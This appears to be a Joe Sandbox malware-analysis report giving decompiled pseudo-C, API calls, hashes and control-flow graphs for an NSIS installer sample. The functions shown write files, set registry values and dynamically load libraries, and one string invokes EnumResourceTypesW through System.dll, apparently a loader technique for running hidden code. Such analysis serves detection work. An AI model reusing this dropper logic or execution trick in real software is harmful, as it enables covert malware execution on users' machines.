                                  						if(__eflags == 0) {
                                  							 *((intOrPtr*)(_t85 - 4)) = 1;
                                  						}
                                  						L31:
                                  						 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t85 - 4));
                                  						__eflags =  *0x42ec28;
                                  						goto L32;
                                  					} else {
                                  						E00405B98(0x40a3c0, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)");
                                  						E00405B98("kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x409bc0);
                                  						E00405BBA(_t75, 0x40a3c0, 0x409bc0, "C:\Users\hardz\AppData\Local\Temp\nsuD883.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
                                  						E00405B98("kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x40a3c0);
                                  						_t62 = E004053C9("C:\Users\hardz\AppData\Local\Temp\nsuD883.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
                                  						__eflags = _t62;
                                  						if(_t62 == 0) {
                                  							continue;
                                  						} else {
                                  							__eflags = _t62 == 1;
                                  							if(_t62 == 1) {
                                  								 *0x42ec28 =  &( *0x42ec28->dwLowDateTime);
                                  								L32:
                                  								_t49 = 0;
                                  								__eflags = 0;
                                  							} else {
                                  								_push(0x409bc0);
                                  								_push(0xfffffffa);
                                  								E00404EA5();
                                  								L29:
                                  								_t49 = 0x7fffffff;
                                  							}
                                  						}
                                  					}
                                  					L33:
                                  					return _t49;
                                  				}
                                  				E00404EA5(0xffffffea,  *(_t85 - 8));
                                  				 *0x42ec54 =  *0x42ec54 + 1;
                                  				_push(_t75);
                                  				_push(_t75);
                                  				_push( *(_t85 - 0x34));
                                  				_push( *((intOrPtr*)(_t85 - 0x1c)));
                                  				_t43 = E00402E6C(); // executed
                                  				 *0x42ec54 =  *0x42ec54 - 1;
                                  				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                                  				_t80 = _t43;
                                  				if( *(_t85 - 0x18) != 0xffffffff) {
                                  					L22:
                                  					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                                  				} else {
                                  					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                                  					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                                  						goto L22;
                                  					}
                                  				}
                                  				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                                  				__eflags = _t80 - _t75;
                                  				if(_t80 >= _t75) {
                                  					goto L31;
                                  				} else {
                                  					__eflags = _t80 - 0xfffffffe;
                                  					if(_t80 != 0xfffffffe) {
                                  						E00405BBA(_t75, _t80, 0x409bc0, 0x409bc0, 0xffffffee);
                                  					} else {
                                  						E00405BBA(_t75, _t80, 0x409bc0, 0x409bc0, 0xffffffe9);
                                  						lstrcatA(0x409bc0,  *(_t85 - 8));
                                  					}
                                  					_push(0x200010);
                                  					_push(0x409bc0);
                                  					E004053C9();
                                  					goto L29;
                                  				}
                                  				goto L33;
                                  			}
















                                  0x004018d3
                                  0x004018bd
                                  0x004018c0
                                  0x004018c9
                                  0x004018c9
                                  0x004018d8
                                  0x004018dd
                                  0x0040221f
                                  0x00000000
                                  0x0040221f
                                  0x00000000

                                  APIs
                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91,00000000,00000000,00000031), ref: 0040177E
                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91,00000000,00000000,00000031), ref: 004017A8
                                    • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,0040317B,Bilsynssteder Setup,NSIS Error), ref: 00405BA5
                                    • Part of subcall function 00404EA5: lstrlenA.KERNEL32(00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000,?), ref: 00404EDE
                                    • Part of subcall function 00404EA5: lstrlenA.KERNEL32(00402FC7,00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000), ref: 00404EEE
                                    • Part of subcall function 00404EA5: lstrcatA.KERNEL32(00429800,00402FC7,00402FC7,00429800,00000000,0041B7D0,74D0EA30), ref: 00404F01
                                    • Part of subcall function 00404EA5: SetWindowTextA.USER32(00429800,00429800), ref: 00404F13
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F39
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F53
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                  • String ID: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91$C:\Users\user\AppData\Local\Temp\nsuD883.tmp$C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dll$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                  • API String ID: 1941528284-1440564832
                                  • Opcode ID: 1365fbaad1701f3f5acf491b2e7367b99c08fa3fb0b06c24217b54d84fa2b958
                                  • Instruction ID: 3eee97e154c7fd254b8817dfe04a4aa8189c03b90b2994f5d00cea6654a5a112
                                  • Opcode Fuzzy Hash: 1365fbaad1701f3f5acf491b2e7367b99c08fa3fb0b06c24217b54d84fa2b958
                                  • Instruction Fuzzy Hash: CA41D932900614BADF10BBB5CD46DAF3679EF05369B20423BF511F11E2DA7C6A418BAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 859 402e6c-402e80 860 402e82 859->860 861 402e89-402e92 859->861 860->861 862 402e94 861->862 863 402e9b-402ea0 861->863 862->863 864 402eb0-402ebd call 40308e 863->864 865 402ea2-402eab call 4030c0 863->865 869 402ec3-402ec7 864->869 870 403039 864->870 865->864 871 403022-403024 869->871 872 402ecd-402f16 GetTickCount 869->872 873 40303b-40303c 870->873 874 403026-403029 871->874 875 403079-40307d 871->875 876 403084 872->876 877 402f1c-402f24 872->877 878 403087-40308b 873->878 881 40302b 874->881 882 40302e-403037 call 40308e 874->882 879 40303e-403044 875->879 880 40307f 875->880 876->878 883 402f26 877->883 884 402f29-402f37 call 40308e 877->884 887 403046 879->887 888 403049-403057 call 40308e 879->888 880->876 881->882 882->870 892 403081 882->892 883->884 884->870 893 402f3d-402f46 884->893 887->888 888->870 896 403059-40306c WriteFile 888->896 892->876 895 402f4c-402f6c call 405fa3 893->895 902 402f72-402f85 GetTickCount 895->902 903 40301a-40301c 895->903 898 40301e-403020 896->898 899 40306e-403071 896->899 898->873 899->898 901 403073-403076 899->901 901->875 904 402f87-402f8f 902->904 905 402fca-402fce 902->905 903->873 906 402f91-402f95 904->906 907 402f97-402fc7 MulDiv wsprintfA call 404ea5 904->907 908 402fd0-402fd3 905->908 909 40300f-403012 905->909 906->905 906->907 907->905 911 402ff5-403000 908->911 912 402fd5-402fe9 WriteFile 908->912 909->877 913 403018 909->913 916 403003-403007 911->916 912->898 915 402feb-402fee 912->915 913->876 915->898 917 402ff0-402ff3 915->917 916->895 918 40300d 916->918 917->916 918->876
                                  C-Code - Quality: 95%
                                  			E00402E6C(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                  				signed int _v8;
                                  				long _v12;
                                  				void* _v16;
                                  				long _v20;
                                  				long _v24;
                                  				intOrPtr _v28;
                                  				char _v92;
                                  				void* _t67;
                                  				void* _t68;
                                  				long _t74;
                                  				intOrPtr _t79;
                                  				long _t80;
                                  				void* _t82;
                                  				int _t84;
                                  				intOrPtr _t95;
                                  				void* _t97;
                                  				void* _t100;
                                  				long _t101;
                                  				signed int _t102;
                                  				long _t103;
                                  				int _t104;
                                  				intOrPtr _t105;
                                  				long _t106;
                                  				void* _t107;
                                  
                                  				_t102 = _a16;
                                  				_t97 = _a12;
                                  				_v12 = _t102;
                                  				if(_t97 == 0) {
                                  					_v12 = 0x8000;
                                  				}
                                  				_v8 = _v8 & 0x00000000;
                                  				_v16 = _t97;
                                  				if(_t97 == 0) {
                                  					_v16 = 0x418bd0;
                                  				}
                                  				_t65 = _a4;
                                  				if(_a4 >= 0) {
                                  					_t95 =  *0x42ebf8; // 0x9994
                                  					E004030C0(_t95 + _t65);
                                  				}
                                  				_t67 = E0040308E( &_a16, 4); // executed
                                  				if(_t67 == 0) {
                                  					L34:
                                  					_push(0xfffffffd);
                                  					goto L35;
                                  				} else {
                                  					if((_a19 & 0x00000080) == 0) {
                                  						if(_t97 == 0) {
                                  							while(_a16 > 0) {
                                  								_t103 = _v12;
                                  								if(_a16 < _t103) {
                                  									_t103 = _a16;
                                  								}
                                  								if(E0040308E(0x414bd0, _t103) == 0) {
                                  									goto L34;
                                  								} else {
                                  									if(WriteFile(_a8, 0x414bd0, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
                                  										L29:
                                  										_push(0xfffffffe);
                                  										L35:
                                  										_pop(_t68);
                                  										return _t68;
                                  									} else {
                                  										_v8 = _v8 + _t103;
                                  										_a16 = _a16 - _t103;
                                  										continue;
                                  									}
                                  								}
                                  							}
                                  							L45:
                                  							return _v8;
                                  						}
                                  						if(_a16 < _t102) {
                                  							_t102 = _a16;
                                  						}
                                  						if(E0040308E(_t97, _t102) != 0) {
                                  							_v8 = _t102;
                                  							goto L45;
                                  						} else {
                                  							goto L34;
                                  						}
                                  					}
                                  					_t74 = GetTickCount();
                                  					 *0x40b534 =  *0x40b534 & 0x00000000;
                                  					 *0x40b530 =  *0x40b530 & 0x00000000;
                                  					_t14 =  &_a16;
                                  					 *_t14 = _a16 & 0x7fffffff;
                                  					_v20 = _t74;
                                  					 *0x40b018 = 8;
                                  					 *0x414bc0 = 0x40cbb8;
                                  					 *0x414bbc = 0x40cbb8;
                                  					 *0x414bb8 = 0x414bb8;
                                  					_a4 = _a16;
                                  					if( *_t14 <= 0) {
                                  						goto L45;
                                  					} else {
                                  						goto L9;
                                  					}
                                  					while(1) {
                                  						L9:
                                  						_t104 = 0x4000;
                                  						if(_a16 < 0x4000) {
                                  							_t104 = _a16;
                                  						}
                                  						if(E0040308E(0x414bd0, _t104) == 0) {
                                  							goto L34;
                                  						}
                                  						_a16 = _a16 - _t104;
                                  						 *0x40b008 = 0x414bd0;
                                  						 *0x40b00c = _t104;
                                  						while(1) {
                                  							_t100 = _v16;
                                  							 *0x40b010 = _t100;
                                  							 *0x40b014 = _v12;
                                  							_t79 = E00405FA3(0x40b008);
                                  							_v28 = _t79;
                                  							if(_t79 < 0) {
                                  								break;
                                  							}
                                  							_t105 =  *0x40b010; // 0x41b7d0
                                  							_t106 = _t105 - _t100;
                                  							_t80 = GetTickCount();
                                  							_t101 = _t80;
                                  							if(( *0x42ec54 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                  								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                  								_t107 = _t107 + 0xc;
                                  								E00404EA5(0,  &_v92);
                                  								_v20 = _t101;
                                  							}
                                  							if(_t106 == 0) {
                                  								if(_a16 > 0) {
                                  									goto L9;
                                  								}
                                  								goto L45;
                                  							} else {
                                  								if(_a12 != 0) {
                                  									_t82 =  *0x40b010; // 0x41b7d0
                                  									_v8 = _v8 + _t106;
                                  									_v12 = _v12 - _t106;
                                  									_v16 = _t82;
                                  									L24:
                                  									if(_v28 != 1) {
                                  										continue;
                                  									}
                                  									goto L45;
                                  								}
                                  								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                  								if(_t84 == 0 || _v24 != _t106) {
                                  									goto L29;
                                  								} else {
                                  									_v8 = _v8 + _t106;
                                  									goto L24;
                                  								}
                                  							}
                                  						}
                                  						_push(0xfffffffc);
                                  						goto L35;
                                  					}
                                  					goto L34;
                                  				}
                                  			}

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402ED3
                                  • GetTickCount.KERNEL32 ref: 00402F7A
                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FA3
                                  • wsprintfA.USER32 ref: 00402FB3
                                  • WriteFile.KERNELBASE(00000000,00000000,0041B7D0,7FFFFFFF,00000000), ref: 00402FE1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CountTick$FileWritewsprintf
                                  • String ID: ... %d%%
                                  • API String ID: 4209647438-2449383134
                                  • Opcode ID: aba47b48a9928ac6846ac2c3c3fa3cecc3ff6eb2f49fa31c431ac569253bfb25
                                  • Instruction ID: e6e53096b9df34268c081c1931919b8a79bb66bca8ede7c05b8811e72ff60024
                                  • Opcode Fuzzy Hash: aba47b48a9928ac6846ac2c3c3fa3cecc3ff6eb2f49fa31c431ac569253bfb25
                                  • Instruction Fuzzy Hash: 17617C7180221AEBCB10CF66DA447AF7BB8EB40755F10453BF810B72D4D7B89A40DBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 919 401f68-401f74 920 401f7a-401f90 call 402a07 * 2 919->920 921 40202f-402031 919->921 931 401f92-401f9d GetModuleHandleA 920->931 932 401f9f-401fad LoadLibraryExA 920->932 923 40217a-40217f call 401423 921->923 929 40289c-4028ab 923->929 930 40266d-402674 923->930 930->929 931->932 934 401faf-401fbc GetProcAddress 931->934 932->934 935 402028-40202a 932->935 937 401ffb-402000 call 404ea5 934->937 938 401fbe-401fc4 934->938 935->923 942 402005-402008 937->942 940 401fc6-401fd2 call 401423 938->940 941 401fdd-401ff4 call 100016da 938->941 940->942 951 401fd4-401fdb 940->951 944 401ff6-401ff9 941->944 942->929 945 40200e-402016 call 4035e3 942->945 944->942 945->929 950 40201c-402023 FreeLibrary 945->950 950->929 951->942
                                  C-Code - Quality: 60%
                                  			E00401F68(void* __ebx, void* __eflags) {
                                  				struct HINSTANCE__* _t18;
                                  				struct HINSTANCE__* _t26;
                                  				void* _t27;
                                  				struct HINSTANCE__* _t30;
                                  				CHAR* _t32;
                                  				intOrPtr* _t33;
                                  				void* _t34;
                                  
                                  				_t27 = __ebx;
                                  				asm("sbb eax, 0x42ec58");
                                  				 *(_t34 - 4) = 1;
                                  				if(__eflags < 0) {
                                  					_push(0xffffffe7);
                                  					L15:
                                  					E00401423();
                                  					L16:
                                  					 *0x42ec28 =  *0x42ec28 +  *(_t34 - 4);
                                  					return 0;
                                  				}
                                  				_t32 = E00402A07(0xfffffff0);
                                  				 *(_t34 + 8) = E00402A07(1);
                                  				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
                                  					L3:
                                  					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                  					_t30 = _t18;
                                  					if(_t30 == _t27) {
                                  						_push(0xfffffff6);
                                  						goto L15;
                                  					}
                                  					L4:
                                  					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                  					if(_t33 == _t27) {
                                  						E00404EA5(0xfffffff7,  *(_t34 + 8));
                                  					} else {
                                  						 *(_t34 - 4) = _t27;
                                  						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
                                  							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x40afc4, " \xef\xbf\xbdB");
                                  						} else {
                                  							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
                                  							if( *_t33() != 0) {
                                  								 *(_t34 - 4) = 1;
                                  							}
                                  						}
                                  					}
                                  					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E004035E3(_t30) != 0) {
                                  						FreeLibrary(_t30);
                                  					}
                                  					goto L16;
                                  				}
                                  				_t26 = GetModuleHandleA(_t32); // executed
                                  				_t30 = _t26;
                                  				if(_t30 != __ebx) {
                                  					goto L4;
                                  				}
                                  				goto L3;
                                  			}

                                  APIs
                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                    • Part of subcall function 00404EA5: lstrlenA.KERNEL32(00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000,?), ref: 00404EDE
                                    • Part of subcall function 00404EA5: lstrlenA.KERNEL32(00402FC7,00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000), ref: 00404EEE
                                    • Part of subcall function 00404EA5: lstrcatA.KERNEL32(00429800,00402FC7,00402FC7,00429800,00000000,0041B7D0,74D0EA30), ref: 00404F01
                                    • Part of subcall function 00404EA5: SetWindowTextA.USER32(00429800,00429800), ref: 00404F13
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F39
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F53
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F61
                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                  • String ID: B$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                  • API String ID: 2987980305-852152979
                                  • Opcode ID: a2a6e10e03f190fb71f87f1f2a28dbfcf7ca9d1997bfabcbdd32e5a8b3878e1a
                                  • Instruction ID: 79fa90d82ccd561df316461cbb3a1ba09b48d8e8b52b881675a17e3388d19d59
                                  • Opcode Fuzzy Hash: a2a6e10e03f190fb71f87f1f2a28dbfcf7ca9d1997bfabcbdd32e5a8b3878e1a
                                  • Instruction Fuzzy Hash: F0215B32904211A6CF207FA5CE89A6E3970AF44358F20413BF601B62D1DBBD49419A5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 953 40231a-402360 call 402afc call 402a07 * 2 RegCreateKeyExA 960 402366-40236e 953->960 961 40289c-4028ab 953->961 962 402370-40237d call 402a07 lstrlenA 960->962 963 40237e-402381 960->963 962->963 966 402391-402394 963->966 967 402383-402390 call 4029ea 963->967 971 4023a5-4023b9 RegSetValueExA 966->971 972 402396-4023a0 call 402e6c 966->972 967->966 975 4023bb 971->975 976 4023be-402494 RegCloseKey 971->976 972->971 975->976 976->961 978 40266d-402674 976->978 978->961
                                  C-Code - Quality: 85%
                                  			E0040231A(void* __eax) {
                                  				void* _t15;
                                  				char* _t18;
                                  				int _t19;
                                  				long _t22;
                                  				char _t24;
                                  				int _t27;
                                  				signed int _t30;
                                  				intOrPtr _t35;
                                  				void* _t37;
                                  
                                  				_t15 = E00402AFC(__eax);
                                  				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                                  				 *(_t37 - 0x2c) =  *(_t37 - 0x10);
                                  				 *(_t37 - 0x44) = E00402A07(2);
                                  				_t18 = E00402A07(0x11);
                                  				_t30 =  *0x42ec50; // 0x100
                                  				 *(_t37 - 4) = 1;
                                  				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27); // executed
                                  				if(_t19 == 0) {
                                  					if(_t35 == 1) {
                                  						E00402A07(0x23);
                                  						_t19 = lstrlenA(0x40a3c0) + 1;
                                  					}
                                  					if(_t35 == 4) {
                                  						_t24 = E004029EA(3);
                                  						 *0x40a3c0 = _t24;
                                  						_t19 = _t35;
                                  					}
                                  					if(_t35 == 3) {
                                  						_t19 = E00402E6C( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a3c0, 0xc00); // executed
                                  					}
                                  					_t22 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x2c), 0x40a3c0, _t19); // executed
                                  					if(_t22 == 0) {
                                  						 *(_t37 - 4) = _t27;
                                  					}
                                  					_push( *(_t37 + 8));
                                  					RegCloseKey();
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *(_t37 - 4);
                                  				return 0;
                                  			}













                                  APIs
                                  • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 00402358
                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuD883.tmp,00000023,?,?,?,00000100,?,?,?,00000011,00000002), ref: 00402378
                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsuD883.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 004023B1
                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsuD883.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040248E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CloseCreateValuelstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsuD883.tmp
                                  • API String ID: 1356686001-1098077770
                                  • Opcode ID: c29f00ab0f4ef0538f62de4efe8d22b9426922cd8dc70cd59bd6115dca28b313
                                  • Instruction ID: b27c2e8e59d72643b8274eff82bc1ff1b80250702ef6c9dc6295bb4b4b5c6925
                                  • Opcode Fuzzy Hash: c29f00ab0f4ef0538f62de4efe8d22b9426922cd8dc70cd59bd6115dca28b313
                                  • Instruction Fuzzy Hash: 8C116071E00108BEEB10EBB5CE8AEAF7678EB44358F10443AF905B61D0D6B86D019B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 979 4015b3-4015c6 call 402a07 call 4056de 984 4015c8-4015e3 call 405670 CreateDirectoryA 979->984 985 40160a-40160d 979->985 992 401600-401608 984->992 993 4015e5-4015f0 GetLastError 984->993 987 401638-40217f call 401423 985->987 988 40160f-40162a call 401423 call 405b98 SetCurrentDirectoryA 985->988 1000 40289c-4028ab 987->1000 1001 40266d-402674 987->1001 988->1000 1004 401630-401633 988->1004 992->984 992->985 996 4015f2-4015fb GetFileAttributesA 993->996 997 4015fd 993->997 996->992 996->997 997->992 1001->1000 1004->1000
                                  C-Code - Quality: 85%
                                  			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                  				struct _SECURITY_ATTRIBUTES** _t12;
                                  				int _t18;
                                  				int _t21;
                                  				struct _SECURITY_ATTRIBUTES* _t22;
                                  				signed char _t24;
                                  				struct _SECURITY_ATTRIBUTES* _t25;
                                  				CHAR* _t27;
                                  				struct _SECURITY_ATTRIBUTES** _t31;
                                  				void* _t32;
                                  
                                  				_t25 = __ebx;
                                  				_t27 = E00402A07(0xfffffff0);
                                  				_t12 = E004056DE(_t27);
                                  				_t29 = _t12;
                                  				if(_t12 != __ebx) {
                                  					do {
                                  						_t31 = E00405670(_t29, 0x5c);
                                  						 *_t31 = _t25;
                                  						 *((char*)(_t32 + 0xb)) =  *_t31;
                                  						_t21 = CreateDirectoryA(_t27, _t25); // executed
                                  						if(_t21 == 0) {
                                  							if(GetLastError() != 0xb7) {
                                  								L4:
                                  								 *((intOrPtr*)(_t32 - 4)) =  *((intOrPtr*)(_t32 - 4)) + 1;
                                  							} else {
                                  								_t24 = GetFileAttributesA(_t27); // executed
                                  								if((_t24 & 0x00000010) == 0) {
                                  									goto L4;
                                  								}
                                  							}
                                  						}
                                  						_t22 =  *((intOrPtr*)(_t32 + 0xb));
                                  						 *_t31 = _t22;
                                  						_t29 =  &(_t31[0]);
                                  					} while (_t22 != _t25);
                                  				}
                                  				if( *((intOrPtr*)(_t32 - 0x20)) == _t25) {
                                  					_push(0xfffffff5);
                                  					E00401423();
                                  				} else {
                                  					E00401423(0xffffffe6);
                                  					E00405B98("C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter\\cavil\\Ablativers91", _t27);
                                  					_t18 = SetCurrentDirectoryA(_t27); // executed
                                  					if(_t18 == 0) {
                                  						 *((intOrPtr*)(_t32 - 4)) =  *((intOrPtr*)(_t32 - 4)) + 1;
                                  					}
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t32 - 4));
                                  				return 0;
                                  			}













                                  APIs
                                    • Part of subcall function 004056DE: CharNextA.USER32(?,?,Resolver.Sel,?,0040574A,Resolver.Sel,Resolver.Sel,?,?,74D0FA90,00405495,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 004056EC
                                    • Part of subcall function 004056DE: CharNextA.USER32(00000000), ref: 004056F1
                                    • Part of subcall function 004056DE: CharNextA.USER32(00000000), ref: 00405705
                                  • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91,00000000,00000000,000000F0), ref: 00401622
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91, xrefs: 00401617
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
